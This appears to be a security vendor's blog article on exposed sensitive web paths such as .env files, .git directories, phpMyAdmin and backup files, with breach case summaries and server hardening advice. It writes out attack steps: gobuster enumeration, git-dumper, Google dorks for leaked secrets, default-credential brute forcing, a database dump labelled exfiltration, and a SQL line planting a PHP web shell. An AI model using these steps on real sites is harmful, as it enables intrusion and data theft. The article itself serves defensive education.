Exposed Sensitive Paths: The Low-Hanging Fruit of Web Security

What is it?

Exposed sensitive paths are files and directories accessible via web browsers that should be restricted from public access. These include configuration files, development artifacts, version control directories, database administration interfaces, and backup files that can reveal critical system information or provide direct access to sensitive resources.

Common examples include:

  • .env files containing database credentials and API keys
  • .git/ directories exposing source code and history
  • wp-admin/ without authentication rate limiting
  • phpMyAdmin/ database management interfaces
  • .sql backup files with full database dumps
  • config.php or settings.py with plaintext secrets
  • .DS_Store files revealing directory structure
  • composer.json, package.json with dependency information
  • Debug logs containing sensitive data
  • Backup files like config.php.bak or database.sql.gz

These paths exist because developers need them during development but forget to restrict or remove them before deployment. A single exposed .env file can grant attackers complete access to your database, external APIs, and authentication systems—essentially handing over the keys to your entire infrastructure.

Why does it matter?

Exposed sensitive paths represent one of the most easily exploitable security vulnerabilities, requiring minimal technical skill while providing maximum impact. Unlike complex exploits that require vulnerability chaining or sophisticated techniques, accessing an exposed .env file is as simple as:

https://your-site.com/.env

Complete System Compromise

A typical .env file contains everything an attacker needs:

DB_HOST=production-db.example.com
DB_DATABASE=app_production
DB_USERNAME=admin
DB_PASSWORD=SuperSecret123!

AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

STRIPE_SECRET_KEY=sk_live_51Abc123...
SMTP_PASSWORD=email_password_here

APP_KEY=base64:random_encryption_key_here
JWT_SECRET=json_web_token_secret

With this information, attackers can:

  • Access your entire database and extract all user data
  • Charge arbitrary amounts to your AWS account
  • Process fraudulent transactions through your payment gateway
  • Send spam through your email service
  • Decrypt encrypted user data
  • Impersonate any user with JWT tokens

Source Code Disclosure

Exposed .git/ directories allow attackers to download your entire codebase:

# Automated tools like git-dumper
git-dumper https://target-site.com/.git/ output-directory

# Now attacker has:
# - All source code
# - Commit history with developer comments
# - Deleted files containing secrets
# - Internal documentation
# - Additional vulnerabilities to exploit

Source code exposure reveals:

  • Business logic and proprietary algorithms
  • Additional API endpoints not linked publicly
  • Commented-out code with hardcoded credentials
  • SQL queries vulnerable to injection
  • Authentication mechanisms to bypass

Database Access via phpMyAdmin

An exposed phpMyAdmin/ installation without IP restrictions allows anyone to access your database management interface. If default credentials haven't been changed (or can be brute-forced), attackers gain:

  • Full database read/write access
  • Ability to execute arbitrary SQL queries
  • User data extraction
  • Database modification or deletion
  • Potential for SQL injection into stored procedures

Information Disclosure for Targeted Attacks

Even "minor" exposures like composer.json or package.json provide attackers with:

  • Exact versions of all dependencies
  • Known vulnerabilities in those specific versions
  • Framework and language version information
  • Development tools and testing frameworks used

This reconnaissance enables precise, targeted attacks rather than generic exploit attempts.

How attacks work

Attackers use automated scanners to discover exposed paths across thousands of sites simultaneously, then manually exploit high-value targets.

Automated Discovery with Dirbusting

Attackers use directory enumeration tools with lists of common sensitive paths:

Using gobuster:

gobuster dir -u https://target-site.com \
    -w /usr/share/wordlists/common-paths.txt \
    -x php,bak,sql,env,git

# Output shows discovered paths:
/.env (Status: 200)
/.git/HEAD (Status: 200)
/backup/database.sql (Status: 200)
/phpMyAdmin/ (Status: 200)

Common wordlists contain:

.env
.env.local
.env.production
.git/HEAD
.git/config
.svn/entries
.DS_Store
config.php
config.php.bak
wp-config.php.bak
database.sql
database.sql.gz
phpMyAdmin/
adminer.php

Exploiting .env Files

  1. Discovery: Scanner finds https://target-site.com/.env returns HTTP 200
  2. Download: Attacker retrieves the file
  3. Parse credentials: Extract database and API credentials
  4. Database access: Connect directly to database:
mysql -h production-db.example.com \
      -u admin \
      -p'SuperSecret123!' \
      app_production
  1. Data exfiltration: Dump entire database:
mysqldump -h production-db.example.com \
          -u admin \
          -p'SuperSecret123!' \
          app_production > stolen_data.sql
  1. Lateral movement: Use AWS keys to access S3 buckets, EC2 instances, or other cloud resources

Git Directory Exploitation

When .git/ is exposed, attackers reconstruct your repository:

Manual method:

# Download key files
curl https://target-site.com/.git/HEAD
curl https://target-site.com/.git/config
curl https://target-site.com/.git/index

# Reconstruct repository
git init
git fetch https://target-site.com/.git

Automated tools:

# git-dumper (more reliable)
git-dumper https://target-site.com/.git/ recovered-repo/

# Now search for secrets in history
cd recovered-repo/
git log --all --full-history --source -- '*password*'
git log --all --full-history --source -- '*secret*'
git log --all --full-history --source -- '*.env*'

Searching commit history for secrets:

# Developers often commit secrets then delete in next commit
# But history preserves them
git log -p | grep -i "password\|secret\|key" -A 2 -B 2

Google Dorking for Exposed Files

Attackers use Google to find exposed files at scale:

Example dorks:

inurl:".env" "DB_PASSWORD"
inurl:".git/HEAD" "ref:"
inurl:"phpMyAdmin" "Welcome to phpMyAdmin"
filetype:sql "INSERT INTO users"
intitle:"Index of" "backup.sql"
inurl:"wp-config.php.bak"

These queries reveal thousands of exposed sites automatically indexed by Google.

Exploiting phpMyAdmin

  1. Discovery: Find /phpMyAdmin/ or /phpmyadmin/ (case variations)
  2. Brute force: Try default credentials:
    • Username: root, admin, pma
    • Password: (empty), root, admin, password
  3. Database access: Once logged in:
    • Export all databases
    • Modify user tables to add administrator accounts
    • Execute SQL to create backdoors
    • Drop tables to cause denial of service

SQL backdoor example:

-- Create PHP backdoor via SQL
SELECT "<?php system($_GET['cmd']); ?>"
INTO OUTFILE '/var/www/html/shell.php';

Backup File Exploitation

Developers create backups before making changes, then forget to delete them:

Common patterns:

config.php.bak
config.php.old
config.php.2026-02-11
config.php~
.config.php.swp
settings.py.backup

Attack process:

# Try variations
curl https://target-site.com/config.php.bak
curl https://target-site.com/config.php~
curl https://target-site.com/includes/config.php.old

# Often these don't execute as PHP, so display plaintext

Unlike the original config.php which executes server-side, .bak files are served as static content, revealing all secrets in plaintext.

Real-world incidents

Uber Data Breach (2016)

Uber suffered a massive data breach affecting 57 million users and drivers. The attackers discovered AWS credentials in a GitHub repository that had been made public.

Attack chain:

  1. Uber developers committed AWS access keys to a private GitHub repo
  2. The repository was later made public (by mistake)
  3. Attackers found the credentials through GitHub search
  4. Used AWS keys to access S3 buckets containing backups
  5. Extracted 57 million user records, including names, emails, and phone numbers
  6. 600,000 driver's license numbers also stolen

Cost:

  • $148 million in settlements
  • CEO fired
  • Criminal charges against CSO for coverup
  • Massive reputational damage

Prevention: Never commit credentials to version control. Use .gitignore to exclude .env files.

Capital One Data Breach (2019)

A former AWS employee exploited misconfigured security to access over 100 million Capital One customer records.

Attack vector:

  1. Discovered misconfigured AWS WAF allowing SSRF (Server-Side Request Forgery)
  2. Used SSRF to access metadata service
  3. Retrieved AWS credentials from metadata endpoint
  4. Used credentials to list and access S3 buckets
  5. Downloaded sensitive data including 140,000 Social Security numbers

While not strictly an "exposed path" in the traditional sense, this demonstrates how exposed credentials (via metadata service) lead to catastrophic breaches.

Cost:

  • $80 million fine from OCC
  • $100-150 million estimated remediation costs
  • Class-action lawsuit settlements
  • Severe reputational damage

WordPress Config Backup Mass Exposure (2018)

Security researchers discovered thousands of WordPress sites with exposed wp-config.php backup files through Google dorking.

Discovery method:

inurl:"wp-config.php.bak"
inurl:"wp-config.php~"
inurl:"wp-config.txt"

Impact:

  • Thousands of sites with exposed database credentials
  • Credentials used to access databases remotely
  • Sites injected with malware and spam
  • User data stolen from e-commerce sites

Root cause: Developers and hosting providers creating backups during updates, forgetting to delete them or restrict access.

Codecov Supply Chain Attack (2021)

Attackers modified Codecov's Bash Uploader script to steal environment variables from CI/CD pipelines.

Attack method:

  1. Compromised Codecov's Docker image build process
  2. Modified bash script to exfiltrate environment variables
  3. Script executed in thousands of CI/CD pipelines
  4. Captured .env variables containing secrets from customers

Victims: Hundreds of companies including Twilio, Hashicorp, and Rapid7

Impact:

  • Customer credentials exposed
  • API keys and cloud access keys stolen
  • Source code potentially accessed
  • Massive supply chain compromise

Lesson: Even properly secured .env files can be exposed if your CI/CD pipeline is compromised.

Git Directory Exposure at Fortune 500 (2020)

A security researcher found an exposed .git/ directory on a Fortune 500 company's subdomain.

What was exposed:

  • Complete source code for internal employee portal
  • Database schema and SQL migration files
  • API keys for internal services
  • Corporate network architecture diagrams
  • Employee authentication bypass methods

Disclosure process:

  1. Researcher discovered via automated scanning
  2. Reported via responsible disclosure
  3. Company fixed within 24 hours
  4. No evidence of malicious exploitation

Key point: Even without active exploitation, exposed repositories create significant risk. Attackers may have found it first without reporting.

What Nyambush detects

Nyambush performs comprehensive scans for exposed sensitive paths across your entire web infrastructure:

  1. Common Configuration Files:

    • .env, .env.local, .env.production, .env.backup
    • config.php, settings.py, web.config
    • database.yml, secrets.yml
    • All variations with .bak, .old, .backup, ~ suffixes
  2. Version Control Directories:

    • .git/HEAD, .git/config, .git/index
    • .svn/, .hg/, .bzr/
    • Detection even when directory listing is disabled
  3. Database Interfaces:

    • phpMyAdmin/, /pma/, /phpmyadmin/ (case-insensitive)
    • adminer.php
    • Database backup files: .sql, .sql.gz, .dump
  4. Framework-Specific Paths:

    • WordPress: wp-config.php.bak, readme.html
    • Laravel: .env, storage/logs/
    • Django: settings.py, local_settings.py
    • Node.js: .env, config.json
  5. Development Artifacts:

    • composer.json, composer.lock
    • package.json, package-lock.json
    • .DS_Store, Thumbs.db
    • .htaccess~, .htpasswd
  6. Backup and Log Files:

    • backup/, backups/, old/
    • *.log, error_log, debug.log
    • *.sql.gz, dump.sql, backup.tar.gz
  7. Cloud Configuration:

    • .aws/credentials
    • .azure/, azure-pipelines.yml
    • gcloud/, .gcloudignore
  8. Risk Scoring:

    • Critical: .env, .git/, database credentials exposed
    • High: phpMyAdmin without authentication, SQL backups
    • Medium: composer.json, framework version disclosure
    • Low: .DS_Store, directory listing enabled

Nyambush attempts to access these paths and analyzes responses:

  • HTTP 200: File directly accessible (critical)
  • HTTP 403: File exists but access denied (good, but reveals presence)
  • HTTP 404: File not found (ideal)

For detected exposures, Nyambush provides:

  • Exact URL of exposed resource
  • Content preview (if safely retrievable)
  • Specific remediation steps
  • Urgency rating based on content sensitivity

How to fix it

Protecting sensitive paths requires multiple layers: preventing exposure at the web server level, proper deployment processes, and ongoing monitoring.

1. Use .gitignore Properly

Prevent sensitive files from ever entering version control:

Comprehensive .gitignore:

# Environment variables
.env
.env.*
!.env.example

# Framework-specific
/vendor/
/node_modules/
/storage/*.key

# Database
*.sql
*.sqlite
*.db

# Logs
*.log
logs/
storage/logs/

# OS
.DS_Store
Thumbs.db

# Editor
*.swp
*.swo
*~
.vscode/
.idea/

# Backups
*.bak
*.backup
*.old
*.tmp

Important: .gitignore only prevents new files from being added. Remove already-committed secrets:

# Remove from history (DANGEROUS - rewrites history)
git filter-branch --force --index-filter \
  "git rm --cached --ignore-unmatch .env" \
  --prune-empty --tag-name-filter cat -- --all

# Or use BFG Repo-Cleaner (faster, safer)
bfg --delete-files .env
git reflog expire --expire=now --all
git gc --prune=now --aggressive

2. Restrict Access with Web Server Configuration

Apache (.htaccess in root directory):

# Deny access to .env files
<FilesMatch "^\.env">
    Order allow,deny
    Deny from all
</FilesMatch>

# Deny access to .git directory
<DirectoryMatch "^/.*/\.git/">
    Order allow,deny
    Deny from all
</DirectoryMatch>

# Deny access to backup files
<FilesMatch "\.(bak|backup|old|save|swp|swo)$">
    Order allow,deny
    Deny from all
</FilesMatch>

# Deny access to composer/package files
<FilesMatch "^(composer\.(json|lock)|package(-lock)?\.json)$">
    Order allow,deny
    Deny from all
</FilesMatch>

# Deny access to log files
<FilesMatch "\.log$">
    Order allow,deny
    Deny from all
</FilesMatch>

# Disable directory listing
Options -Indexes

Nginx (in server block):

server {
    listen 80;
    server_name example.com;
    root /var/www/html;

    # Deny .env files
    location ~ /\.env {
        deny all;
        return 404;
    }

    # Deny .git directory
    location ~ /\.git {
        deny all;
        return 404;
    }

    # Deny backup files
    location ~ \.(bak|backup|old|save|swp|swo)$ {
        deny all;
        return 404;
    }

    # Deny composer/package files
    location ~ ^/(composer\.(json|lock)|package(-lock)?\.json)$ {
        deny all;
        return 404;
    }

    # Deny log files
    location ~ \.log$ {
        deny all;
        return 404;
    }

    # Disable directory listing
    autoindex off;
}

3. Remove Files from Web Root

The safest approach is keeping sensitive files outside the web-accessible directory:

Directory structure:

project/
├── app/              # Application code (not web-accessible)
├── config/           # Configuration (not web-accessible)
│   └── .env          # Environment variables here
├── storage/          # Logs, cache (not web-accessible)
└── public/           # Web root - ONLY this directory accessible
    ├── index.php
    ├── css/
    └── js/

Web server configuration points to public/ only:

Apache:

DocumentRoot /var/www/project/public

Nginx:

root /var/www/project/public;

4. Restrict phpMyAdmin Access

IP Whitelist in Apache:

<Directory /usr/share/phpmyadmin>
    Order Deny,Allow
    Deny from all
    Allow from 203.0.113.0/24  # Your office network
    Allow from 198.51.100.50   # Your home IP
</Directory>

IP Whitelist in Nginx:

location /phpMyAdmin {
    allow 203.0.113.0/24;
    allow 198.51.100.50;
    deny all;
}

Use non-standard path:

# Instead of /phpMyAdmin, use random path
mv /usr/share/phpmyadmin /usr/share/pma-x7j3k9

Require HTTP Basic Auth:

<Directory /usr/share/phpmyadmin>
    AuthType Basic
    AuthName "Restricted Access"
    AuthUserFile /etc/apache2/.htpasswd
    Require valid-user
</Directory>

Create password file:

htpasswd -c /etc/apache2/.htpasswd admin

Better solution: Don't expose phpMyAdmin at all. Use SSH tunneling:

# SSH tunnel from local machine
ssh -L 8080:localhost:80 user@server

# Access phpMyAdmin at http://localhost:8080/phpMyAdmin

5. Delete Backup and Temporary Files

Find and remove backup files:

# Find backup files
find /var/www/html -type f \( \
    -name "*.bak" -o \
    -name "*.backup" -o \
    -name "*.old" -o \
    -name "*.save" -o \
    -name "*~" \
\)

# Delete them (BE CAREFUL - verify list first)
find /var/www/html -type f \( \
    -name "*.bak" -o \
    -name "*.backup" -o \
    -name "*.old" -o \
    -name "*.save" -o \
    -name "*~" \
\) -delete

Automated cleanup script:

#!/bin/bash
# cleanup-backups.sh

WEB_ROOT="/var/www/html"

# Extensions to remove
EXTENSIONS=("bak" "backup" "old" "save" "tmp" "swp" "swo")

for ext in "${EXTENSIONS[@]}"; do
    find "$WEB_ROOT" -type f -name "*.$ext" -mtime +7 -delete
done

echo "Backup file cleanup completed"

Run via cron:

0 2 * * * /usr/local/bin/cleanup-backups.sh

6. Proper Deployment Process

Use deployment tools that exclude sensitive files:

Deployer (PHP):

// deploy.php
set('shared_files', ['.env']);
set('copy_dirs', ['node_modules', 'vendor']);

Capistrano (Ruby):

# config/deploy.rb
set :linked_files, %w{.env config/database.yml}

Ansible:

- name: Deploy application
  synchronize:
    src: ./
    dest: /var/www/html/
    rsync_opts:
      - "--exclude=.git"
      - "--exclude=.env"
      - "--exclude=node_modules"

7. robots.txt Considerations

DO NOT use robots.txt to hide sensitive paths:

# BAD - This tells attackers exactly where secrets are!
User-agent: *
Disallow: /admin/
Disallow: /backup/
Disallow: /.env

This is counterproductive because:

  • Attackers don't respect robots.txt
  • It advertises the existence of sensitive paths
  • It provides a roadmap for reconnaissance

robots.txt is for search engines, not security.

8. Security Headers

Add headers to prevent accidental exposure:

# Prevent browsers from MIME-sniffing
Header set X-Content-Type-Options "nosniff"

# Prevent clickjacking
Header set X-Frame-Options "DENY"

9. Regular Security Audits

Automated scanning:

# Nikto web server scanner
nikto -h https://your-site.com

# dirb directory bruteforcer
dirb https://your-site.com

# wpscan for WordPress
wpscan --url https://your-site.com --enumerate

Manual verification:

# Test common paths
curl https://your-site.com/.env
curl https://your-site.com/.git/HEAD
curl https://your-site.com/phpMyAdmin/
curl https://your-site.com/config.php.bak

10. Cloud Storage Security

For files stored in S3, Azure Blob, or Google Cloud Storage:

AWS S3 - Restrict bucket access:

{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "DenyPublicAccess",
    "Effect": "Deny",
    "Principal": "*",
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::your-bucket/*",
    "Condition": {
      "StringNotEquals": {
        "aws:SourceVpce": "vpce-1234567"
      }
    }
  }]
}

Enable S3 Block Public Access:

aws s3api put-public-access-block \
    --bucket your-bucket \
    --public-access-block-configuration \
    "BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true"

Summary

Exposed sensitive paths represent critical security vulnerabilities that are trivially easy for attackers to exploit yet can grant complete system access. A single exposed .env file, .git/ directory, or phpMyAdmin installation can lead to full database compromise, AWS account takeover, and theft of all user data.

Protection requires multiple defensive layers:

  • Proper .gitignore to prevent secrets from entering version control
  • Web server restrictions to block access to sensitive paths
  • Files outside web root for maximum security
  • Regular audits to detect and remove backup files
  • Secure deployment processes that exclude sensitive files

Never rely on robots.txt or "security through obscurity"—attackers use automated scanners that test thousands of common paths regardless of what you attempt to hide.

Nyambush automatically scans your infrastructure for exposed paths including configuration files, version control directories, database interfaces, and backup files. We identify exactly which sensitive resources are publicly accessible and provide specific remediation steps to secure them before attackers discover them.

This is low-hanging fruit that attackers harvest first. Secure these paths today before your credentials, source code, or database become tomorrow's breach headline.

Share this article:Post on X

Is your domain secure?

Run a free scan with Nyambush to check your security risks right now.